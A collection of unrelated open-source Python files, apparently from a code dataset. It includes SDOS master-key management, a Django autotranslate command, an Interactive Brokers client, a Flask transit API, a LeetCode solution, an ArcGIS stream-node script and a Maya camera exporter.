self.containerNameSdosMgmt))
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
if not self.plainMasterKey:
raise KeyError("Master key is not available")
return self.plainMasterKey
def get_new_key_and_replace_current(self, first_run=False):
if not self.next_deletable:
raise KeyError("can't replace current master key without new wrapping (deletable) key")
if not first_run and not self.plainMasterKey:
raise KeyError("not allowed while current master is locked")
new_master = CryptoLib.generateRandomKey()
self.plainMasterKey = new_master
dc = DataCrypt(self.next_deletable)
self.next_deletable = None
wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master))
store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
wrapped_key=wrapped_key)
return self.plainMasterKey
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': bool(self.next_deletable)
}
def clear_next_deletable(self):
self.next_deletable = None
def provide_next_deletable(self, passphrase):
nd = CryptoLib.digestKeyString(passphrase)
if not nd:
raise KeyError("could not digest the provided passphrase")
self.next_deletable = nd
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase):
logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt))
by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
if not by:
logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
self.containerNameSdosMgmt))
self.provide_next_deletable(passphrase)
self.get_new_key_and_replace_current(first_run=True)
return
try:
dc = DataCrypt(CryptoLib.digestKeyString(passphrase))
plain = dc.decryptBytesIO(by)
self.plainMasterKey = plain.read()
except:
raise KeyError("wrong passphrase. Failed decrypting master key")
###############################################################################
###############################################################################
# tpm key source
# use a tpm key as deletable key. the master key will be encrypted with a different
# tpm-bound, non-migratable key inside the TPM
###############################################################################
###############################################################################
class MasterKeyTPM(object):
my_key_type = "tpm"
def __init__(self, swiftBackend, container_name_mgmt, tpm_key_id):
self.containerNameSdosMgmt = container_name_mgmt
self.swiftBackend = swiftBackend
self.plainMasterKey = None
self.keyId = tpm_key_id
assert (self.keyId > 0)
try:
from sdos.util.tpmLib import TpmLib
self.tpm = TpmLib()
except ImportError:
logging.exception("unable to import TPM lib, TPM functions will not be available")
self.tpm = None
try:
self.unlock_key()
except:
logging.exception("unlocking master key failed for {}! Key source is not ready...".format(
self.containerNameSdosMgmt))
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
if not self.plainMasterKey:
raise KeyError("Master key is not available")
return self.plainMasterKey
def get_new_key_and_replace_current(self, first_run=False):
# if not self.next_deletable:
# raise KeyError("can't replace current master key without new wrapping (deletable) key")
if not first_run and not self.plainMasterKey:
raise KeyError("not allowed while current master is locked")
new_master = CryptoLib.generateRandomKey()
next_deletable = self.tpm.get_new_key_and_replace_current(self.keyId, first_run=first_run)
wrapped_key = io.BytesIO(next_deletable.bind(new_master))
# TODO ADD key id to store_wrapped_key?
store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
wrapped_key=wrapped_key)
self.plainMasterKey = new_master
return self.plainMasterKey
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': True
}
def clear_next_deletable(self):
pass
def provide_next_deletable(self):
pass
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase=None):
logging.info("unlocking the TPM backed master key from {}".format(self.containerNameSdosMgmt))
by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
if not by:
logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
self.containerNameSdosMgmt))
self.get_new_key_and_replace_current(first_run=True)
return
try:
deletable = self.tpm.get_current_key(self.keyId)
self.plainMasterKey = bytes(deletable.unbind(by.read()))
except:
raise KeyError("TPM Error. Failed decrypting master key")
| mit | 7,323,551,077,043,263,000 | 41.434783 | 118 | 0.524974 | false | 4.71213 | false | false | false |
ahmedsalman/django-autotranslate | autotranslate/management/commands/translate_messages.py | 1 | 8592 | import logging
import os
import re
from optparse import make_option
import polib
from django.conf import settings
from django.core.management.base import BaseCommand
from autotranslate.utils import translate_strings
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = ('autotranslate all the message files that have been generated '
'using the `makemessages` command.')
option_list = BaseCommand.option_list + (
make_option('--locale', '-l', default=[], dest='locale', action='append',
help='autotranslate the message files for the given locale(s) (e.g. pt_BR). '
'can be used multiple times.'),
make_option('--untranslated', '-u', default=False, dest='skip_translated', action='store_true',
help='autotranslate the fuzzy and empty messages only.'),
make_option('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true',
help='set the fuzzy flag on autotranslated messages.'),
)
def add_arguments(self, parser):
# Previously, only the standard optparse library was supported and
# you would have to extend the command option_list variable with optparse.make_option().
# See: https://docs.djangoproject.com/en/1.8/howto/custom-management-commands/#accepting-optional-arguments
# In django 1.8, these custom options can be added in the add_arguments()
parser.add_argument('--locale', '-l', default=[], dest='locale', action='append',
help='autotranslate the message files for the given locale(s) (e.g. pt_BR). '
'can be used multiple times.')
parser.add_argument('--untranslated', '-u', default=False, dest='skip_translated', action='store_true',
help='autotranslate the fuzzy and empty messages only.')
parser.add_argument('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true',
help='set the fuzzy flag on autotranslated messages.')
def set_options(self, **options):
self.locale = options['locale']
self.skip_translated = options['skip_translated']
self.set_fuzzy = options['set_fuzzy']
def handle(self, *args, **options):
self.set_options(**options)
assert getattr(settings, 'USE_I18N', False), 'i18n framework is disabled'
assert getattr(settings, 'LOCALE_PATHS', []), 'locale paths is not configured properly'
for directory in settings.LOCALE_PATHS:
# walk through all the paths
# and find all the pot files
for root, dirs, files in os.walk(directory):
for file in files:
if not file.endswith('.po'):
# process file only
# if its a pot file
continue
# get the target language from the parent folder name
target_language = os.path.basename(os.path.dirname(root))
if self.locale and target_language not in self.locale:
logger.info('skipping translation for locale `{}`'.format(target_language))
continue
self.translate_file(root, file, target_language)
def translate_file(self, root, file_name, target_language):
"""
convenience method for translating a pot file
:param root: the absolute path of folder where the file is present
:param file_name: name of the file to be translated (it should be a pot file)
:param target_language: language in which the file needs to be translated
"""
logger.info('filling up translations for locale `{}`'.format(target_language))
po = polib.pofile(os.path.join(root, file_name))
strings = self.get_strings_to_translate(po)
# translate the strings,
# all the translated strings are returned
# in the same order on the same index
# viz. [a, b] -> [trans_a, trans_b]
translated_strings = translate_strings(strings, target_language, 'en', False)
self.update_translations(po, translated_strings)
po.save()
def need_translate(self, entry):
if self.skip_translated:
return not self.skip_translated or not entry.translated()
return not self.skip_translated or not entry.translated() or not entry.obsolete
def get_strings_to_translate(self, po):
"""Return list of string to translate from po file.
:param po: POFile object to translate
:type po: polib.POFile
:return: list of string to translate
:rtype: collections.Iterable[six.text_type]
"""
strings = []
for index, entry in enumerate(po):
if not self.need_translate(entry):
continue
strings.append(humanize_placeholders(entry.msgid))
if entry.msgid_plural:
strings.append(humanize_placeholders(entry.msgid_plural))
return strings
def update_translations(self, entries, translated_strings):
"""Update translations in entries.
The order and number of translations should match to get_strings_to_translate() result.
:param entries: list of entries to translate
:type entries: collections.Iterable[polib.POEntry] | polib.POFile
:param translated_strings: list of translations
:type translated_strings: collections.Iterable[six.text_type]
"""
translations = iter(translated_strings)
for entry in entries:
if not self.need_translate(entry):
continue
if entry.msgid_plural:
# fill the first plural form with the entry.msgid translation
translation = next(translations)
translation = fix_translation(entry.msgid, translation)
entry.msgstr_plural[0] = translation
# fill the rest of plural forms with the entry.msgid_plural translation
translation = next(translations)
translation = fix_translation(entry.msgid_plural, translation)
for k, v in entry.msgstr_plural.items():
if k != 0:
entry.msgstr_plural[k] = translation
else:
translation = next(translations)
translation = fix_translation(entry.msgid, translation)
entry.msgstr = translation
# Set the 'fuzzy' flag on translation
if self.set_fuzzy and 'fuzzy' not in entry.flags:
entry.flags.append('fuzzy')
def humanize_placeholders(msgid):
"""Convert placeholders to the (google translate) service friendly form.
%(name)s -> __name__
%s -> __item__
%d -> __number__
"""
# return re.sub(
# r'%(?:\((\w+)\))?([sd])',
# lambda match: r'__{0}__'.format(
# match.group(1).lower() if match.group(1) else 'number' if match.group(2) == 'd' else 'item'),
# msgid)
msgid = re.sub(
r'%(?:\(([\w\|\:\.]+)\))?(s)',
lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 's', '[[[[xstr]]]]'),
msgid)
msgid = re.sub(
r'%(?:\(([\w\|\:\.]+)\))?(d)',
lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 'd', '[[[[xnum]]]]'),
msgid)
return msgid
def restore_placeholders(msgid, translation):
"""Restore placeholders in the translated message."""
placehoders = re.findall(r'(\s*)(%(?:\(\w+\))?[sd])(\s*)', msgid)
return re.sub(
r'(\s*)(_____[\w]+?_____)(\s*)',
lambda matches: '{0}{1}{2}'.format(placehoders[0][0], placehoders[0][1], placehoders.pop(0)[2]),
translation)
def fix_translation(msgid, translation):
# Google Translate removes a lot of formatting, these are the fixes:
# - Add newline in the beginning if msgid also has that
if msgid.startswith('\n') and not translation.startswith('\n'):
translation = u'\n' + translation
# - Add newline at the end if msgid also has that
if msgid.endswith('\n') and not translation.endswith('\n'):
translation += u'\n'
# Remove spaces that have been placed between %(id) tags
translation = restore_placeholders(msgid, translation)
return translation
| mit | 3,598,298,534,061,988,000 | 42.393939 | 120 | 0.591597 | false | 4.317588 | false | false | false |
robcarver17/pysystemtrade | sysbrokers/IB/client/ib_client.py | 1 | 3045 | from dateutil.tz import tz
import datetime
from ib_insync import Contract
from ib_insync import IB
from sysbrokers.IB.ib_connection import connectionIB
from syscore.dateutils import strip_timezone_fromdatetime
from syslogdiag.logger import logger
from syslogdiag.log_to_screen import logtoscreen
_PACING_PERIOD_SECONDS = 10 * 60
_PACING_PERIOD_LIMIT = 60
PACING_INTERVAL_SECONDS = 1 + (_PACING_PERIOD_SECONDS / _PACING_PERIOD_LIMIT)
STALE_SECONDS_ALLOWED_ACCOUNT_SUMMARY = 600
IB_ERROR_TYPES = {200: "invalid_contract"}
IB_IS_ERROR = [200]
class ibClient(object):
"""
Client specific to interactive brokers
We inherit from this to do interesting stuff, so this base class just offers error handling and get time
"""
def __init__(self, ibconnection: connectionIB, log: logger=logtoscreen("ibClient")):
# means our first call won't be throttled for pacing
self.last_historic_price_calltime = (
datetime.datetime.now() -
datetime.timedelta(
seconds=_PACING_PERIOD_SECONDS))
# Add error handler
ibconnection.ib.errorEvent += self.error_handler
self._ib_connnection = ibconnection
self._log = log
@property
def ib_connection(self) -> connectionIB:
return self._ib_connnection
@property
def ib(self) -> IB:
return self.ib_connection.ib
@property
def client_id(self) -> int:
return self.ib.client.clientId
@property
def log(self):
return self._log
def error_handler(self, reqid: int, error_code: int, error_string: str, contract: Contract):
"""
Error handler called from server
Needs to be attached to ib connection
:param reqid: IB reqid
:param error_code: IB error code
:param error_string: IB error string
:param contract: IB contract or None
:return: success
"""
if contract is None:
contract_str = ""
else:
contract_str = " (%s/%s)" % (
contract.symbol,
contract.lastTradeDateOrContractMonth,
)
msg = "Reqid %d: %d %s %s" % (
reqid, error_code, error_string, contract_str)
iserror = error_code in IB_IS_ERROR
if iserror:
# Serious requires some action
myerror_type = IB_ERROR_TYPES.get(error_code, "generic")
self.broker_error(msg, myerror_type)
else:
# just a warning / general message
self.broker_message(msg)
def broker_error(self, msg, myerror_type):
self.log.warn(msg)
def broker_message(self, msg):
self.log.msg(msg)
def refresh(self):
self.ib.sleep(0.00001)
def get_broker_time_local_tz(self) -> datetime.datetime:
ib_time = self.ib.reqCurrentTime()
local_ib_time_with_tz = ib_time.astimezone(tz.tzlocal())
local_ib_time = strip_timezone_fromdatetime(local_ib_time_with_tz)
return local_ib_time
| gpl-3.0 | 4,736,020,536,605,287,000 | 25.478261 | 108 | 0.625616 | false | 3.722494 | false | false | false |
open-city/school-admissions | api/endpoints.py | 1 | 3229 | from flask import Blueprint, make_response, request, jsonify, \
session as flask_session
import json
from sqlalchemy import Table, func, or_
from api.database import session, engine, Base
from api.models import SourceDest
endpoints = Blueprint('endpoints', __name__)
@endpoints.route('/matrix/')
def matrix():
start = request.args.get('start')
resp = {
'meta': {
'status': 'ok',
'message': ''
}
}
if not start:
resp['meta']['status'] = 'error'
resp['meta']['message'] = 'start is required'
else:
start = start.split(',')
zone_table = Table('zone09_cmap_2009', Base.metadata,
autoload=True, autoload_with=engine, keep_existing=True)
school_table = Table('cps_school_locations_sy1415', Base.metadata,
autoload=True, autoload_with=engine, keep_existing=True)
zone_query = session.query(zone_table.c.zone09)\
.filter(func.st_contains(zone_table.c.geom,
func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)),
)
start_zone = [i[0] for i in zone_query.all()][0]
school_query = session.query(SourceDest, school_table.c.schoolname, school_table.c.schooladdr)\
.filter(SourceDest.dest == school_table.c.zone)\
.filter(SourceDest.source == start_zone)\
.filter(school_table.c.school_category == 'HS')\
.order_by(SourceDest.in_vehicle_time)\
.limit(10).all()
resp['objects'] = []
for source_dest, name, addr in school_query:
d = source_dest.as_dict()
d['school_name'] = name
d['address'] = addr
resp['objects'].append(d)
resp = make_response(json.dumps(resp))
resp.headers['Content-Type'] = 'application/json'
return resp
@endpoints.route('/transit-time/')
def transit_time():
start = request.args.get('start')
end = request.args.get('end')
resp = {
'meta': {
'status': 'ok',
'message': ''
}
}
if not start or not end:
resp['meta']['status'] = 'error'
resp['meta']['message'] = 'start and end are required'
else:
start = start.split(',')
end = end.split(',')
zone_table = Table('zone09_cmap_2009', Base.metadata,
autoload=True, autoload_with=engine, keep_existing=True)
query = session.query(zone_table.c.zone09)\
.filter(or_(
func.st_contains(zone_table.c.geom,
func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)),
func.st_contains(zone_table.c.geom,
func.st_pointfromtext('POINT(' + str(end[1]) + ' ' + str(end[0]) + ')', 4326))
))
start_zone, end_zone = [i[0] for i in query.all()]
travel_time = session.query(SourceDest)\
.filter(SourceDest.source == start_zone)\
.filter(SourceDest.dest == end_zone).first()
resp['travel_time'] = travel_time.as_dict()
resp = make_response(json.dumps(resp))
resp.headers['Content-Type'] = 'application/json'
return resp
| mit | 6,371,344,603,827,604,000 | 38.864198 | 103 | 0.560545 | false | 3.567956 | false | false | false |
Shuailong/Leetcode | solutions/maximum-size-subarray-sum-equals-k.py | 1 | 2057 | #!/usr/bin/env python
# encoding: utf-8
"""
maximum-size-subarray-sum-equals-k.py
Created by Shuailong on 2016-01-06.
https://leetcode.com/problems/maximum-size-subarray-sum-equals-k/.
"""
'''Not solved yet.'''
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
n = len(nums)
sums = [0]*(n+1)
for i in range(1, n+1):
sums[i] = sums[i-1] + nums[i-1]
res = 0
for i in range(n):
for j in range(n-1,i-1+res,-1):
if sums[j] - sums[i] == k and j - i > res:
res = j - i
return res
class Solution2(object):
'''TLE'''
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
n = len(nums)
max_length = 0
for start_index in range(n):
this_length = 0
subsum = 0
j = start_index
while j < n:
subsum += nums[j]
if subsum == k:
this_length = j - start_index + 1
j += 1
if this_length > max_length:
max_length = this_length
return max_length
class Solution1(object):
'''TLE'''
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
n = len(nums)
for length in range(n,0,-1):
for start_index in range(n-length+1):
subsum = 0
for i in range(length):
subsum += nums[start_index+i]
if subsum == k:
return length
return 0
def main():
solution = Solution()
nums = [1, -1, 5, -2, 3]
k = 3
print solution.maxSubArrayLen(nums,k)
nums = [-2, -1, 2, 1]
k = 1
print solution.maxSubArrayLen(nums,k)
if __name__ == '__main__':
main()
| mit | -1,179,304,352,611,225,900 | 20.893617 | 66 | 0.450656 | false | 3.451342 | false | false | false |
rmichie/TTools | Step1_SegmentStream.py | 1 | 14902 | ########################################################################
# TTools
# Step 1: Create Stream Nodes version 0.953
# Ryan Michie
# This script will take an input polyline feature with unique
# stream IDs and generate evenly spaced points along each
# unique stream ID polyline at a user defined spacing measured from
# the downstream endpoint. The script can also check the digitized
# direction to determine the downstream end.
# INPUTS
# 0: Stream centerline polyline (streamline_fc)
# 1: Unique StreamID field (sid_field)
# 2: Spacing between nodes in meters (node_dx)
# 3: Outputs a continuous stream km regardless of
# unique the values in the stream ID field (cont_stream_km)
# 3: OPTIONAL True/False flag to check if the stream was digitized in
# correct direction (checkDirection)
# 4: OPTIONAL Elevation Raster used in the check stream
# direction procedure (z_raster)
# 5: Path/Name of output node feature class (nodes_fc)
# OUTPUTS
# point feature class
# The output point feature class has the following fields:
# 0: NODE_ID - unique node ID
# 1: STREAM_ID"- field matching a unique polyline ID field identifed
# by the user,
# 2: STREAM_KM - double measured from the downstream end of the stream
# for each STREAM ID
# 3: LONGITUDE - decimal degrees X coordinate of the node using GCS_WGS_1984 datum.
# 4: LATITUDE - decimal degrees Y coordinate of the node using GCS_WGS_1984 datum.
# 5. ASPECT - stream aspect in the direction of flow"
# Future Updates
# eliminate arcpy and use gdal for reading/writing feature class data
# This version is for manual starts from within python.
# This script requires Python 2.6 and ArcGIS 10.1 or higher to run.
########################################################################
# Import system modules
from __future__ import division, print_function
import sys
import os
import gc
import time
import traceback
from datetime import timedelta
from math import ceil, atan2, degrees
from operator import itemgetter
import arcpy
from arcpy import env
env.overwriteOutput = True
# ----------------------------------------------------------------------
# Start Fill in Data
streamline_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_streams_major"
sid_field = "NAME"
node_dx = 50
cont_stream_km = True
checkDirection = True
z_raster = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_be_m_mosaic"
nodes_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_stream_nodes"
# End Fill in Data
# ----------------------------------------------------------------------
# Parameter fields for python toolbox
#streamline_fc = parameters[0].valueAsText
#sid_field = parameters[1].valueAsText
#node_dx = parameters[2].valueAsText
#cont_stream_km = parameters[3].valueAsText
#checkDirection = parameters[4].valueAsText
#z_raster = = parameters[5].valueAsText
#nodes_fc = parameters[6].valueAsText
#streamline_fc = arcpy.GetParameterAsText(0)
#sid_field = arcpy.GetParameterAsText(1)
#node_dx = arcpy.GetParameterAsText(2)
#checkDirection = arcpy.GetParameterAsText(3)
#z_raster = arcpy.GetParameterAsText(4)
#nodes_fc = arcpy.GetParameterAsText(5)
def create_node_list(streamline_fc, checkDirection, z_raster):
"""Reads an input stream centerline file and returns the NODE ID,
STREAM ID, and X/Y coordinates as a list"""
nodeList = []
incursorFields = ["SHAPE@","SHAPE@LENGTH", sid_field]
nodeID = 0
# Determine input projection and spatial units
proj = arcpy.Describe(streamline_fc).spatialReference
con_from_m = from_meters_con(streamline_fc)
con_to_m = to_meters_con(streamline_fc)
# Pull the stream IDs into a list
sid_list = []
with arcpy.da.SearchCursor(streamline_fc, sid_field,"",proj) as Inrows:
for row in Inrows:
sid_list.append(row[0])
# Check for duplicate stream IDs
dups = list(set([i for i in sid_list if sid_list.count(i) > 1]))
if dups:
sys.exit("There are duplicate stream IDs in your input stream"+
"feature class."+
"\nHere are the duplicates: \n"+
"{0}".format(dups))
# Now create the nodes. I'm pulling the fc data twice because on
# speed tests it is faster compared to saving all the incursorFields
# to a list and iterating over the list
print("Creating Nodes")
with arcpy.da.SearchCursor(streamline_fc, incursorFields,"",proj) as Inrows:
for row in Inrows:
lineLength = row[1] # These units are in the units of projection
numNodes = int(lineLength * con_to_m / node_dx)
nodes = range(0,numNodes+1)
mid = range(0,numNodes)
if checkDirection is True:
flip = check_stream_direction(row[0], z_raster, row[2])
else:
flip = 1
arcpy.SetProgressor("step", "Creating Nodes", 0, numNodes+1, 1)
# list of percentage of feature length to traverse
positions = [n * node_dx * con_from_m / lineLength for n in nodes]
segment_length = [node_dx] * numNodes + [lineLength * con_to_m % node_dx]
mid_distance = node_dx * con_from_m / lineLength
if mid_distance > 1:
# this situation occurs when the stream < node_dx.
# The azimith is calculated for the entire stream line.
mid_distance = 1
i = 0
for position in positions:
node = row[0].positionAlongLine(abs(flip - position),
True).centroid
# Get the coordinates at the up/down midway point along
# the line between nodes and calculate the stream azimuth
if position == 0.0:
mid_up = row[0].positionAlongLine(
abs(flip - (position + mid_distance)),True).centroid
mid_down = node
elif 0.0 < position + mid_distance < 1:
mid_up = row[0].positionAlongLine(
abs(flip - (position + mid_distance)),True).centroid
mid_down = row[0].positionAlongLine(
abs(flip - (position - mid_distance)),True).centroid
else:
mid_up = node
mid_down = row[0].positionAlongLine(
abs(flip - (position - mid_distance)),True).centroid
stream_azimuth = degrees(atan2((mid_down.X - mid_up.X),
(mid_down.Y - mid_up.Y)))
if stream_azimuth < 0:
stream_azimuth = stream_azimuth + 360
# list of "NODE_ID","STREAM_ID". "STREAM_KM", "LENGTH",
# "POINT_X","POINT_Y", "ASPECT", "SHAPE@X", "SHAPE@Y"
nodeList.append([nodeID, row[2],
float(position * lineLength * con_to_m /1000),
segment_length[i],
node.X, node.Y, stream_azimuth, node.X, node.Y])
nodeID = nodeID + 1
i = i + 1
arcpy.SetProgressorPosition()
arcpy.ResetProgressor()
return(nodeList)
def create_nodes_fc(nodeList, nodes_fc, sid_field, proj):
"""Create the output point feature class using
the data from the nodes list"""
#arcpy.AddMessage("Exporting Data")
print("Exporting Data")
# Determine Stream ID field properties
sid_type = arcpy.ListFields(streamline_fc,sid_field)[0].type
sid_precision = arcpy.ListFields(streamline_fc,sid_field)[0].precision
sid_scale = arcpy.ListFields(streamline_fc,sid_field)[0].scale
sid_length = arcpy.ListFields(streamline_fc,sid_field)[0].length
#Create an empty output with the same projection as the input polyline
cursorfields = ["NODE_ID",
"STREAM_ID",
"STREAM_KM",
"LENGTH",
"LONGITUDE",
"LATITUDE",
"ASPECT"]
arcpy.CreateFeatureclass_management(os.path.dirname(nodes_fc),
os.path.basename(nodes_fc),
"POINT","","DISABLED","DISABLED",proj)
# Add attribute fields
for f in cursorfields:
if f == "STREAM_ID":
arcpy.AddField_management(nodes_fc, f, sid_type, sid_precision,
sid_scale, sid_length, "",
"NULLABLE", "NON_REQUIRED")
else:
arcpy.AddField_management(nodes_fc, f, "DOUBLE", "", "", "",
"", "NULLABLE", "NON_REQUIRED")
with arcpy.da.InsertCursor(nodes_fc, cursorfields + ["SHAPE@X","SHAPE@Y"]) as cursor:
for row in nodeList:
cursor.insertRow(row)
#Change X/Y from input spatial units to decimal degrees
proj_dd = arcpy.SpatialReference(4326) # GCS_WGS_1984
with arcpy.da.UpdateCursor(nodes_fc,["SHAPE@X","SHAPE@Y","LONGITUDE",
"LATITUDE"],"",proj_dd) as cursor:
for row in cursor:
row[2] = row[0] # LONGITUDE
row[3] = row[1] # LATITUDE
cursor.updateRow(row)
def check_stream_direction(stream, z_raster, streamID):
"""Samples the elevation raster at both ends of the stream
polyline to see which is the downstream end and returns flip = 1
if the stream km need to be reversed"""
down = stream.positionAlongLine(0,True).centroid
up = stream.positionAlongLine(1,True).centroid
# when a single raster cell is sampled it is a little faster to
# use arcpy compared to converting to an array and then sampling.
# I left the code just in case though
z_down = float(arcpy.GetCellValue_management (z_raster, str(down.X)+ " "+ str(down.Y),1).getOutput(0))
z_up = float(arcpy.GetCellValue_management (z_raster, str(up.X) + " "+ str(up.Y),1).getOutput(0))
#z_down = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(down.X, down.Y), 1, 1, -9999)[0][0]
#z_up = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(up.X, up.Y), 1, 1, -9999)[0][0]
if z_down <= z_up or z_down == -9999 or z_up == -9999:
# do not reverse stream km
flip = 0
else:
print("Reversing {0}".format(streamID))
# reversed stream km
flip = 1
return flip
def to_meters_con(inFeature):
"""Returns the conversion factor to get from the
input spatial units to meters"""
try:
con_to_m = arcpy.Describe(inFeature).SpatialReference.metersPerUnit
except:
arcpy.AddError("{0} has a coordinate system ".format(inFeature)+
"that is not projected or not recognized. "+
"Use a projected coordinate system "
"preferably in linear units of feet or meters.")
sys.exit("Coordinate system is not projected or not recognized. "+
"Use a projected coordinate system, preferably in linear "+
"units of feet or meters.")
return con_to_m
def from_meters_con(inFeature):
"""Returns the conversion factor to get from meters to the
spatial units of the input feature class"""
try:
con_from_m = 1 / arcpy.Describe(inFeature).SpatialReference.metersPerUnit
except:
arcpy.AddError("{0} has a coordinate system ".format(inFeature)+
"that is not projected or not recognized. "+
"Use a projected coordinate system "
"preferably in linear units of feet or meters.")
sys.exit("Coordinate system is not projected or not recognized. "+
"Use a projected coordinate system, preferably in linear "+
"units of feet or meters.")
return con_from_m
#enable garbage collection
gc.enable()
try:
#keeping track of time
startTime= time.time()
# Check if the output exists
if arcpy.Exists(nodes_fc):
arcpy.AddError("\nThis output already exists: \n" +
"{0}\n".format(nodes_fc) +
"Please rename your output.")
sys.exit("This output already exists: \n" +
"{0}\n".format(nodes_fc) +
"Please rename your output.")
# Get the spatial projecton of the input stream lines
proj = arcpy.Describe(streamline_fc).SpatialReference
if checkDirection is True:
proj_ele = arcpy.Describe(z_raster).spatialReference
# Check to make sure the elevatiohn raster and input
# streams are in the same projection.
if proj.name != proj_ele.name:
arcpy.AddError("{0} and {1} do not ".format(nodes_fc,z_raster)+
"have the same projection."+
"Please reproject your data.")
sys.exit("Input stream line and elevation raster do not have "
"the same projection. Please reproject your data.")
# Create the stream nodes and return them as a list
nodeList = create_node_list(streamline_fc, checkDirection, z_raster)
if cont_stream_km:
#sort the list by stream ID and stream km
nodeList = sorted(nodeList, key=itemgetter(1, 2))
skm = 0.0
for i in range(0, len(nodeList)):
nodeList[i][2] = skm
skm = skm + (node_dx * 0.001)
# re sort the list by stream km (with downstream end at the top)
nodeList = sorted(nodeList, key=itemgetter(2), reverse=True)
else:
#sort the list by stream ID and then stream km (downstream end at the top)
nodeList = sorted(nodeList, key=itemgetter(1,2), reverse=True)
# Create the output node feature class with the nodes list
create_nodes_fc(nodeList, nodes_fc, sid_field, proj)
gc.collect()
endTime = time.time()
elapsedmin = ceil(((endTime - startTime) / 60)* 10)/10
mspernode = timedelta(seconds=(endTime - startTime) / len(nodeList)).microseconds
print("Process Complete in {0} minutes. {1} microseconds per node".format(elapsedmin, mspernode))
#arcpy.AddMessage("Process Complete in %s minutes. %s microseconds per node" % (elapsedmin, mspernode))
# For arctool errors
except arcpy.ExecuteError:
msgs = arcpy.GetMessages(2)
#arcpy.AddError(msgs)
print(msgs)
# For other errors
except:
tbinfo = traceback.format_exc()
pymsg = "PYTHON ERRORS:\n" + tbinfo + "\nError Info:\n" +str(sys.exc_info()[1])
msgs = "ArcPy ERRORS:\n" + arcpy.GetMessages(2) + "\n"
#arcpy.AddError(pymsg)
#arcpy.AddError(msgs)
print(pymsg)
print(msgs) | gpl-3.0 | 3,051,930,570,020,387,300 | 40.628492 | 108 | 0.593679 | false | 3.930889 | false | false | false |
westernx/mayatools | mayatools/camera/exporterui.py | 1 | 6399 | from __future__ import absolute_import
from uitools.qt import QtCore, QtGui, Qt
from maya import cmds, mel
import sgpublish.exporter.ui.publish.maya
import sgpublish.exporter.ui.tabwidget
import sgpublish.exporter.ui.workarea
import sgpublish.uiutils
from sgpublish.exporter.ui.publish.generic import PublishSafetyError
from .exporter import CameraExporter, get_nodes_to_export
class Dialog(QtGui.QDialog):
def __init__(self):
super(Dialog, self).__init__()
self._setup_ui()
def _setup_ui(self):
self.setWindowTitle("Camera Export")
self.setLayout(QtGui.QVBoxLayout())
self.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
camera_row = QtGui.QHBoxLayout()
camera_row.setSpacing(2)
self.layout().addLayout(camera_row)
self._cameras = QtGui.QComboBox()
camera_row.addWidget(self._cameras)
self._cameras.activated.connect(self._on_cameras_changed)
button = QtGui.QPushButton("Reload")
button.clicked.connect(self._on_reload)
button.setFixedHeight(self._cameras.sizeHint().height())
button.setFixedWidth(button.sizeHint().width())
camera_row.addWidget(button)
box = QtGui.QGroupBox("Manifest Summary")
self.layout().addWidget(box)
box.setLayout(QtGui.QVBoxLayout())
self._summary = QtGui.QLabel("Select a camera.")
box.layout().addWidget(self._summary)
box.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
box = QtGui.QGroupBox("Options")
self.layout().addWidget(box)
box.setLayout(QtGui.QVBoxLayout())
self._worldSpaceBox = QtGui.QCheckBox("Bake to World Space (for debugging)")
box.layout().addWidget(self._worldSpaceBox)
self._exporter = CameraExporter()
self._exporter_widget = sgpublish.exporter.ui.tabwidget.Widget()
self.layout().addWidget(self._exporter_widget)
# SGPublishes.
tab = sgpublish.exporter.ui.publish.maya.Widget(self._exporter)
tab.beforeScreenshot.connect(lambda *args: self.hide())
tab.afterScreenshot.connect(lambda *args: self.show())
self._exporter_widget.addTab(tab, "Publish to Shotgun")
# Work area.
tab = sgpublish.exporter.ui.workarea.Widget(self._exporter, {
'directory': 'scenes/camera',
'sub_directory': '',
'extension': '.ma',
'warning': self._warning,
'error': self._warning,
})
self._exporter_widget.addTab(tab, "Export to Work Area")
button_row = QtGui.QHBoxLayout()
button_row.addStretch()
self.layout().addLayout(button_row)
self._button = button = QtGui.QPushButton("Export")
button.clicked.connect(self._on_export)
button_row.addWidget(button)
self._populate_cameras()
